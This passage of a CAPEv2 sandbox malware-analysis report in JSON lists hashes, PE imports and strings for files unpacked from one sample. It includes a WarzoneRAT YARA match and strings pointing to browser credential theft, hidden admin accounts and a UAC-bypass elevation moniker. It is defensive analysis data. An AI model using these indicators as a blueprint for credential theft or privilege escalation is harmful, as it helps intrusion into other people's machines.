"?'?3?x?", "4.5D5", "6'7?7h7", "hZ^1*5", "9o:v:", "`.rdata", "<8=^=", "3\"434<6C6J6R6W6^6q6v6", "4?5Q5g5", ">\">)>l>", "*010L0", "1$1B1g1r1", ";);\\;m;", "?(?9?c?", "=.=8===D=U=]=d=k=r=y=", "0 0?0P0W0l0", "7(7.74797?7I7U7b7i7n7z7", "0>1W1", "1)1E1U1[1n1", "<)5?O?~?", "1L2c2", "0(080A0H0", "50[031`1!2N2*3W3o4" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 0, "cape_type": "", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492 }, { "name": "0bed8dd35102e1301be6e19c299c2767f6b64d9dd2341c1227fb47bb43e884c9", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/0bed8dd35102e1301be6e19c299c2767f6b64d9dd2341c1227fb47bb43e884c9", "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?0x0A520000;?", "size": 304, "crc32": "D5241E3B", "md5": "1614faaaa8228fd43c8274fba836396e", "sha1": "e32c830f359b59162969913ce1821d6f2589bb7a", "sha256": "0bed8dd35102e1301be6e19c299c2767f6b64d9dd2341c1227fb47bb43e884c9", "sha512": "f78c80e4ca10a5b94e4dea49e9c2393b1f5c3f9e3aac2f682d34b908ec8be920a8b97f3cf15c6efcdf03633e86cc44d6a0e60ea0c5e10a16c37eae502475468d", "rh_hash": null, "ssdeep": "6:ow84o6D1RNQvZqzwOF/Pl34ycFGfavFwcvxDugRlwtTtRg6hjQXBtefDJ:oYo6DNQv89/Pe4YX8pGD3eV", "type": "data", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T117E07D133001726351511AFBD4A57C4E80868413872E25C394542B791AD7FD281F45E0", "sha3_384": "ff8b5b2ec0bf05070b5821d477125340478b2f61968388d87d6bcd7df0085b9f59c4adce5302a9364ba41e04d34df74d", "data": null, "strings": [ "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 9, "cape_type": "Unpacked Shellcode", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 7456, "virtual_address": "0x0A520000" }, { "name": "ba4a50037e0be83499bd7a55913acadcead8aa948f808606204d40ea6ffac34e", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/ba4a50037e0be83499bd7a55913acadcead8aa948f808606204d40ea6ffac34e", "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?0x08C60000;?", "size": 304, "crc32": "2F572C7D", "md5": "f64106cc6747805f2818205940a40966", "sha1": "a3c49b40e95bce3898734bee12c75d34c9865ef2", "sha256": "ba4a50037e0be83499bd7a55913acadcead8aa948f808606204d40ea6ffac34e", "sha512": "ece52799d7260fde312e89b036c31cc6cca6cf54637431248aac8b8c5a3cdf5f28b26442896f22c3a7d5856fa286a8c1366ef3c05fdde9ecf98005a281bb2a0b", "rh_hash": null, "ssdeep": "6:ow84W5NQvZqzwOF/Pl34ycFGfavFwcvxDugRlwtTtRg6hjQXBtefDJ:oYKNQv89/Pe4YX8pGD3eV", "type": "data", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T10FE07D133041A673516119FBC0B57D4A84C68053872E26C3A4442BB91AC3ED285F49E0", "sha3_384": "1d8377d13da259396b6602d5f63298e3adc96fcca038b538883a4a315163cfb7c85c660054574f7b66f1d974fc72cd95", "data": null, "strings": [ "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 9, "cape_type": "Unpacked Shellcode", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 7456, "virtual_address": "0x08C60000" }, { "name": "021d01fe3793879f57a2942664fc7c096710e94e87ad13dc21467c12edf61546", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/021d01fe3793879f57a2942664fc7c096710e94e87ad13dc21467c12edf61546", "guest_paths": "0;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?", "size": 11264, "crc32": "CD5BB326", "md5": "ad9fd1564dd1c6be54747e84444b8f55", "sha1": "001495af4af443265200340a08b5e07dc2a32553", "sha256": "021d01fe3793879f57a2942664fc7c096710e94e87ad13dc21467c12edf61546", "sha512": "6151b5cad24614c812debd23501edc607292959cbeaa4b323093bfe144f622029fe803b09cd752a5c4c44e17f150987a87514ad27b7ebb4666015a4a3add22b2", "rh_hash": null, "ssdeep": "96:bF2LOYFGrf4msMbe5r3NyTWrAZt7zd54fMVgYncY67AEA3dbwQNKSbuVmyVx9X:ALKf4my3ssAnktY67AN3BwQbqVx9X", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T17332F817B79901B2E66D02707E7A847653BE3432270690E7E87BB1995EF0A94BC31E13", "sha3_384": "9093e57135394e0a360a0b90125618fa74a4db06fcf1ee53e1d3d57f34fea0788c923be675ab96d66f8282671b6ac802", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x00001450", "ep_bytes": "558bec81ec0c020000a10030400033c5", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x0000bbbf", "osversion": "5.1", "pdbpath": null, "imports": { "KERNEL32": { "dll": "KERNEL32.dll", "imports": [ { "address": "0x402000", "name": "WaitForSingleObject" }, { "address": "0x402004", "name": "CreateFileW" }, { "address": "0x402008", "name": "GetSystemDirectoryW" }, { "address": "0x40200c", "name": "lstrcatW" }, { "address": "0x402010", "name": "LockResource" }, { "address": "0x402014", "name": "CloseHandle" }, { "address": "0x402018", "name": "LoadLibraryW" }, { "address": "0x40201c", "name": "GetTempPathW" }, { "address": "0x402020", "name": "FindResourceW" }, { "address": "0x402024", "name": "GetWindowsDirectoryW" }, { "address": "0x402028", "name": "GetProcAddress" }, { "address": "0x40202c", "name": "ExitProcess" }, { "address": "0x402030", "name": "TerminateProcess" }, { "address": "0x402034", "name": "GetCurrentProcess" }, { "address": "0x402038", "name": "IsProcessorFeaturePresent" }, { "address": "0x40203c", "name": "GetModuleFileNameW" }, { "address": "0x402040", "name": "WriteFile" }, { "address": "0x402044", "name": "LoadResource" }, { "address": "0x402048", "name": "SizeofResource" }, { "address": "0x40204c", "name": "SetUnhandledExceptionFilter" }, { "address": "0x402050", "name": "UnhandledExceptionFilter" } ] }, "USER32": { "dll": "USER32.dll", "imports": [ { "address": "0x402068", "name": "MessageBoxW" } ] }, "SHELL32": { "dll": "SHELL32.dll", "imports": [ { "address": "0x40205c", "name": "SHCreateItemFromParsingName" }, { "address": "0x402060", "name": "ShellExecuteExW" } ] }, "ole32": { "dll": "ole32.dll", "imports": [ { "address": "0x402070", "name": "CoCreateInstance" }, { "address": "0x402074", "name": "CoUninitialize" }, { "address": "0x402078", "name": "CoInitialize" }, { "address": "0x40207c", "name": "CoGetObject" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x0000266c", "size": "0x00000064" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00004000", "size": "0x00001270" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x000024b0", "size": "0x0000001c" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x000024d0", "size": "0x00000040" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00002000", "size": "0x00000084" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x000006ba", "size_of_data": "0x00000800", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "4.88" }, { "name": ".rdata", "raw_address": "0x00000c00", "virtual_address": "0x00002000", "virtual_size": "0x00000994", "size_of_data": "0x00000a00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "4.79" }, { "name": ".data", "raw_address": "0x00001600", "virtual_address": "0x00003000", "virtual_size": "0x00000f78", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.16" }, { "name": ".rsrc", "raw_address": "0x00001800", "virtual_address": "0x00004000", "virtual_size": "0x00001270", "size_of_data": "0x00001400", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "3.31" } ], "overlay": null, "resources": [ { "name": "WM_DISP", "offset": "0x00004070", "size": "0x00001200", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ARABIC_QATAR", "entropy": "3.56" } ], "versioninfo": [], "imphash": "74112afb67d4cb152ebd8ee76f449460", "timestamp": "2018-08-05 00:55:45", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null, "imported_dll_count": 4 }, "data": null, "strings": [ "KERNEL32.dll", "FindResourceW", "ellocnak.xml", ".text$mn", "explorer.exe", "dismcore.dll", ".idata$5", "/n:%temp%\\ellocnak.xml", ".idata$3", ".data", "RtlEnterCriticalSection", "ntdll.dll", "TerminateProcess", "/Rich3", "IsProcessorFeaturePresent", " ", "GetSystemDirectoryW", "CoUninitialize", " ", "WM_DISP", "CoCreateInstance", "ole32.dll", ".text", "LockResource", "CloseHandle", "CreateToolhelp32Snapshot", "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}", ".rdata$zzzdbg", "RtlInitUnicodeString", " ", " ", "UnhandledExceptionFilter", "X0`0d0,181", "RegQueryValueExW", "RtlFillMemory", "\\pkgmgr.exe", "LdrEnumerateLoadedModules", "GetStartupInfoW", "VWh@\"@", ".idata$2", "ShellExecuteExW", "", ".rsrc$01", " ", ".rsrc$02", "2(212<2C2c2i2o2u2{2", "CreateProcessW", "%systemroot%\\system32\\", "GetWindowsDirectoryW", "!This program cannot be run in DOS mode.", "RegOpenKeyExW", "GetTempPathW", "GetCurrentProcess", "u*hh;@", "MessageBoxW", "LoadResource", "Hey I'm Admin", "CreateFileW", "RtlGetCurrentPeb", "", "GetProcAddress", "Process32NextW", "`.rdata", ".idata$4", ".rsrc", "Process32FirstW", ".rdata", "SetUnhandledExceptionFilter", "ExitProcess", "SOFTWARE\\_rptls", " ", "CoInitialize", "Install", "PathFindFileNameW", ".00cfg", "LoadLibraryW", "ExpandEnvironmentStringsW", "lstrcatW", "RegCloseKey", "1)1E1U1[1n1", "\\explorer.exe", ".reloc", "KRich", "NtAllocateVirtualMemory", "USER32.dll", "3.373F3", "GetModuleFileNameW", "", "WaitForSingleObject", "WriteFile", "SHCreateItemFromParsingName", "lstrcmpW", "SizeofResource", ".idata$6", "ADVAPI32.dll", "OpenProcess", "SHLWAPI.dll", "SHELL32.dll", "@.data", "CoGetObject", "RtlLeaveCriticalSection" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 0, "cape_type": "", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492 }, { "name": "7defec1ca7f2b1b0757b40463d8ee1591d7e3261142fa55b3aca0b774cd0d158", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/7defec1ca7f2b1b0757b40463d8ee1591d7e3261142fa55b3aca0b774cd0d158", "guest_paths": "0;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?", "size": 87552, "crc32": "1C47020F", "md5": "a6dd6e1533f885e3c7ba66d2126b0c10", "sha1": "a0a443bc1e58bcb86aba57d69973b4674d0ff68c", "sha256": "7defec1ca7f2b1b0757b40463d8ee1591d7e3261142fa55b3aca0b774cd0d158", "sha512": "1649f2698542d60a1573e4c6c06ee0aecc9e13743acb75fced3494db6710444b31cf09ba8692a43c088bc8bbb77a7861ae9dfdb7496000cbc3314190dd2262c7", "rh_hash": null, "ssdeep": "768:uJDMG6hv9DYcsyOUhyKt5GkEzisR1NFFlDF5EqcdSyxaQgyXYcgN2o67vzFoUoyk:uf6Z91iwpEp1NFFvESLGSN67vzFG", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [], "cape_yara": [ { "name": "WarzoneRAT", "meta": { "author": "ditekshen", "description": "WarzoneRAT payload", "cape_type": "WarzoneRAT Payload" }, "strings": [ "PK11_CheckUserPassword", "PK11_Authenticate", "PK11SDR_Decrypt", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "AVE_MARIA", "127.0.0.", "R\u0000D\u0000P\u0000C\u0000l\u0000i\u0000p\u0000", "G\u0000r\u0000a\u0000b\u0000b\u0000e\u0000r\u0000", "@\u0000\\\u0000c\u0000m\u0000d\u0000.\u0000e\u0000x\u0000e\u0000", "/\u0000n\u0000:\u0000%\u0000t\u0000e\u0000m\u0000p\u0000%\u0000\\\u0000e\u0000l\u0000l\u0000o\u0000c\u0000n\u0000a\u0000k\u0000.\u0000x\u0000m\u0000l\u0000", "H\u0000e\u0000y\u0000 \u0000I\u0000'\u0000m\u0000 \u0000A\u0000d\u0000m\u0000i\u0000n\u0000", "s\u0000o\u0000f\u0000t\u0000o\u0000k\u0000n\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "n\u0000s\u0000s\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "l\u0000o\u0000g\u0000i\u0000n\u0000s\u0000.\u0000j\u0000s\u0000o\u0000n\u0000" ], "addresses": { "s1_1": 62316, "s1_2": 62256, "s1_3": 62276, "s1_4": 64448, "s1_5": 65932, "s1_6": 60876, "s2_1": 65836, "s2_2": 66740, "s2_5": 65886, "s2_6": 76048, "s2_7": 76096, "d1": 62156, "d2": 61968, "d3": 62650 } } ], "clamav": [], "tlsh": "T1C4839E23F7E14879FBB203702DBC7AB583DDFA361262D96B676994430C72484E625393", "sha3_384": "e09b12785945c049ac412ea76039bdeca9fd47f7a1dadedeee4fafeb7ab82684c2fd930ce47de5104b344aca0c6cd644", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x00005687", "ep_bytes": "558bec83ec4456ff15ac0041008bc88a", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x00024e89", "osversion": "5.1", "pdbpath": null, "imports": { "KERNEL32": { "dll": "KERNEL32.dll", "imports": [ { "address": "0x410074", "name": "VirtualAlloc" }, { "address": "0x410078", "name": "GetModuleFileNameW" }, { "address": "0x41007c", "name": "GetTempPathA" }, { "address": "0x410080", "name": "CreateFileA" }, { "address": "0x410084", "name": "LockResource" }, { "address": "0x410088", "name": "LoadResource" }, { "address": "0x41008c", "name": "FindResourceW" }, { "address": "0x410090", "name": "CreateProcessW" }, { "address": "0x410094", "name": "GetModuleHandleA" }, { "address": "0x410098", "name": "HeapAlloc" }, { "address": "0x41009c", "name": "GetProcessHeap" }, { "address": "0x4100a0", "name": "LoadLibraryA" }, { "address": "0x4100a4", "name": "GetProcAddress" }, { "address": "0x4100a8", "name": "ExitProcess" }, { "address": "0x4100ac", "name": "GetCommandLineA" }, { "address": "0x4100b0", "name": "GetStartupInfoA" }, { "address": "0x4100b4", "name": "HeapFree" }, { "address": "0x4100b8", "name": "HeapReAlloc" }, { "address": "0x4100bc", "name": "VirtualQuery" }, { "address": "0x4100c0", "name": "TerminateThread" }, { "address": "0x4100c4", "name": "CreateThread" }, { "address": "0x4100c8", "name": "LoadLibraryW" }, { "address": "0x4100cc", "name": "GetCurrentThreadId" }, { "address": "0x4100d0", "name": "GetBinaryTypeW" }, { "address": "0x4100d4", "name": "GetTempPathW" }, { "address": "0x4100d8", "name": "GetPrivateProfileStringW" }, { "address": "0x4100dc", "name": "GlobalAlloc" }, { "address": "0x4100e0", "name": "Sleep" }, { "address": "0x4100e4", "name": "SetCurrentDirectoryW" }, { "address": "0x4100e8", "name": "LocalFree" }, { "address": "0x4100ec", "name": "FreeLibrary" }, { "address": "0x4100f0", "name": "WaitForSingleObject" }, { "address": "0x4100f4", "name": "GetCurrentProcess" }, { "address": "0x4100f8", "name": "ReadFile" }, { "address": "0x4100fc", "name": "WaitForMultipleObjects" }, { "address": "0x410100", "name": "CreatePipe" }, { "address": "0x410104", "name": "PeekNamedPipe" }, { "address": "0x410108", "name": "DuplicateHandle" }, { "address": "0x41010c", "name": "WriteFile" }, { "address": "0x410110", "name": "CreateEventA" }, { "address": "0x410114", "name": "GetComputerNameW" }, { "address": "0x410118", "name": "LoadLibraryExW" }, { "address": "0x41011c", "name": "FindFirstFileW" }, { "address": "0x410120", "name": "FindNextFileW" }, { "address": "0x410124", "name": "SetFilePointer" }, { "address": "0x410128", "name": "CreateFileW" }, { "address": "0x41012c", "name": "GetLogicalDriveStringsW" }, { "address": "0x410130", "name": "DeleteFileW" }, { "address": "0x410134", "name": "GetFileSize" }, { "address": "0x410138", "name": "CopyFileW" }, { "address": "0x41013c", "name": "GetDriveTypeW" }, { "address": "0x410140", "name": "EnterCriticalSection" }, { "address": "0x410144", "name": "LeaveCriticalSection" }, { "address": "0x410148", "name": "InitializeCriticalSection" }, { "address": "0x41014c", "name": "DeleteCriticalSection" }, { "address": "0x410150", "name": "CreateMutexA" }, { "address": "0x410154", "name": "ReleaseMutex" }, { "address": "0x410158", "name": "TerminateProcess" }, { "address": "0x41015c", "name": "OpenProcess" }, { "address": "0x410160", "name": "CreateToolhelp32Snapshot" }, { "address": "0x410164", "name": "Process32NextW" }, { "address": "0x410168", "name": "Process32FirstW" }, { "address": "0x41016c", "name": "lstrcmpW" }, { "address": "0x410170", "name": "GetTickCount" }, { "address": "0x410174", "name": "VirtualFree" }, { "address": "0x410178", "name": "lstrcpyW" }, { "address": "0x41017c", "name": "WideCharToMultiByte" }, { "address": "0x410180", "name": "lstrcpyA" }, { "address": "0x410184", "name": "lstrcatW" }, { "address": "0x410188", "name": "MultiByteToWideChar" }, { "address": "0x41018c", "name": "lstrcatA" }, { "address": "0x410190", "name": "lstrcmpA" }, { "address": "0x410194", "name": "lstrlenA" }, { "address": "0x410198", "name": "ExpandEnvironmentStringsW" }, { "address": "0x41019c", "name": "lstrlenW" }, { "address": "0x4101a0", "name": "CloseHandle" }, { "address": "0x4101a4", "name": "GetLastError" }, { "address": "0x4101a8", "name": "SetLastError" }, { "address": "0x4101ac", "name": "SetEvent" }, { "address": "0x4101b0", "name": "SizeofResource" }, { "address": "0x4101b4", "name": "GetCurrentDirectoryW" } ] }, "USER32": { "dll": "USER32.dll", "imports": [ { "address": "0x41020c", "name": "ToUnicode" }, { "address": "0x410210", "name": "PostQuitMessage" }, { "address": "0x410214", "name": "RegisterRawInputDevices" }, { "address": "0x410218", "name": "GetLastInputInfo" }, { "address": "0x41021c", "name": "wsprintfA" }, { "address": "0x410220", "name": "DefWindowProcA" }, { "address": "0x410224", "name": "GetForegroundWindow" }, { "address": "0x410228", "name": "MapVirtualKeyA" }, { "address": "0x41022c", "name": "GetRawInputData" }, { "address": "0x410230", "name": "RegisterClassW" }, { "address": "0x410234", "name": "CreateWindowExW" }, { "address": "0x410238", "name": "DispatchMessageA" }, { "address": "0x41023c", "name": "wsprintfW" }, { "address": "0x410240", "name": "TranslateMessage" }, { "address": "0x410244", "name": "GetMessageA" }, { "address": "0x410248", "name": "MessageBoxA" }, { "address": "0x41024c", "name": "GetWindowTextW" } ] }, "ADVAPI32": { "dll": "ADVAPI32.dll", "imports": [ { "address": "0x410000", "name": "OpenServiceW" }, { "address": "0x410004", "name": "RegQueryInfoKeyW" }, { "address": "0x410008", "name": "QueryServiceConfigW" }, { "address": "0x41000c", "name": "EnumServicesStatusExW" }, { "address": "0x410010", "name": "StartServiceW" }, { "address": "0x410014", "name": "RegEnumKeyExW" }, { "address": "0x410018", "name": "RegQueryValueExW" }, { "address": "0x41001c", "name": "RegCloseKey" }, { "address": "0x410020", "name": "RegCreateKeyExW" }, { "address": "0x410024", "name": "RegCreateKeyExA" }, { "address": "0x410028", "name": "OpenSCManagerW" }, { "address": "0x41002c", "name": "CloseServiceHandle" }, { "address": "0x410030", "name": "GetTokenInformation" }, { "address": "0x410034", "name": "LookupAccountSidW" }, { "address": "0x410038", "name": "FreeSid" }, { "address": "0x41003c", "name": "OpenProcessToken" }, { "address": "0x410040", "name": "AllocateAndInitializeSid" }, { "address": "0x410044", "name": "AdjustTokenPrivileges" }, { "address": "0x410048", "name": "LookupPrivilegeValueW" }, { "address": "0x41004c", "name": "RegDeleteValueW" }, { "address": "0x410050", "name": "RegSetValueExA" }, { "address": "0x410054", "name": "RegDeleteKeyW" }, { "address": "0x410058", "name": "RegOpenKeyExW" }, { "address": "0x41005c", "name": "RegSetValueExW" }, { "address": "0x410060", "name": "ChangeServiceConfigW" } ] }, "SHELL32": { "dll": "SHELL32.dll", "imports": [ { "address": "0x4101d8", "name": "ShellExecuteExA" }, { "address": "0x4101e0", "name": "ShellExecuteA" }, { "address": "0x4101e4", "name": "SHCreateDirectoryExW" }, { "address": "0x4101e8", "name": "SHGetSpecialFolderPathW" }, { "address": "0x4101ec", "name": "ShellExecuteW" } ] }, "urlmon": { "dll": "urlmon.dll", "imports": [ { "address": "0x4102ac", "name": "URLDownloadToFileW" } ] }, "WS2_32": { "dll": "WS2_32.dll", "imports": [ { "address": "0x410254", "name": "gethostbyname" }, { "address": "0x410258", "name": "ntohs" }, { "address": "0x41025c", "name": "ioctlsocket" }, { "address": "0x410260", "name": "WSACleanup" }, { "address": "0x410264", "name": "closesocket" }, { "address": "0x410268", "name": "shutdown" }, { "address": "0x41026c", "name": "getaddrinfo" }, { "address": "0x410270", "name": "inet_addr" }, { "address": "0x410274", "name": "setsockopt" }, { "address": "0x410278", "name": "freeaddrinfo" }, { "address": "0x41027c", "name": "htons" }, { "address": "0x410280", "name": "recv" }, { "address": "0x410284", "name": "connect" }, { "address": "0x410288", "name": "socket" }, { "address": "0x41028c", "name": "send" }, { "address": "0x410290", "name": "WSAStartup" } ] }, "ole32": { "dll": "ole32.dll", "imports": [ { "address": "0x410298", "name": "CoCreateInstance" }, { "address": "0x41029c", "name": "CoUninitialize" }, { "address": "0x4102a0", "name": "CoInitialize" }, { "address": "0x4102a4", "name": "CoTaskMemFree" } ] }, "SHLWAPI": { "dll": "SHLWAPI.dll", "imports": [ { "address": "0x4101f4", "name": "StrStrW" }, { "address": "0x4101f8", "name": "StrStrA" }, { "address": "0x4101fc", "name": "PathFindExtensionW" }, { "address": "0x410200", "name": "PathFileExistsW" }, { "address": "0x410204", "name": "PathFindFileNameW" } ] }, "NETAPI32": { "dll": "NETAPI32.dll", "imports": [ { "address": "0x4101bc", "name": "NetUserAdd" }, { "address": "0x4101c0", "name": "NetLocalGroupAddMembers" } ] }, "OLEAUT32": { "dll": "OLEAUT32.dll", "imports": [ { "address": "0x4101c8", "name": "VariantInit" } ] }, "CRYPT32": { "dll": "CRYPT32.dll", "imports": [ { "address": "0x410068", "name": "CryptStringToBinaryA" }, { "address": "0x41006c", "name": "CryptUnprotectData" } ] }, "PSAPI": { "dll": "PSAPI.DLL", "imports": [ { "address": "0x4101d0", "name": "GetModuleFileNameExW" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x00011ddc", "size": "0x00000104" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00014000", "size": "0x00002c70" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00017000", "size": "0x00000ab8" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00011c60", "size": "0x0000001c" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00010000", "size": "0x000002c0" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x0000e4a9", "size_of_data": "0x0000e600", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "6.44" }, { "name": ".rdata", "raw_address": "0x0000ea00", "virtual_address": "0x00010000", "virtual_size": "0x00002c3a", "size_of_data": "0x00002e00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "4.90" }, { "name": ".data", "raw_address": "0x00011800", "virtual_address": "0x00013000", "virtual_size": "0x00000d00", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "1.81" }, { "name": ".rsrc", "raw_address": "0x00011a00", "virtual_address": "0x00014000", "virtual_size": "0x00002c70", "size_of_data": "0x00002e00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "3.96" }, { "name": ".reloc", "raw_address": "0x00014800", "virtual_address": "0x00017000", "virtual_size": "0x00000ab8", "size_of_data": "0x00000c00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ", "characteristics_raw": 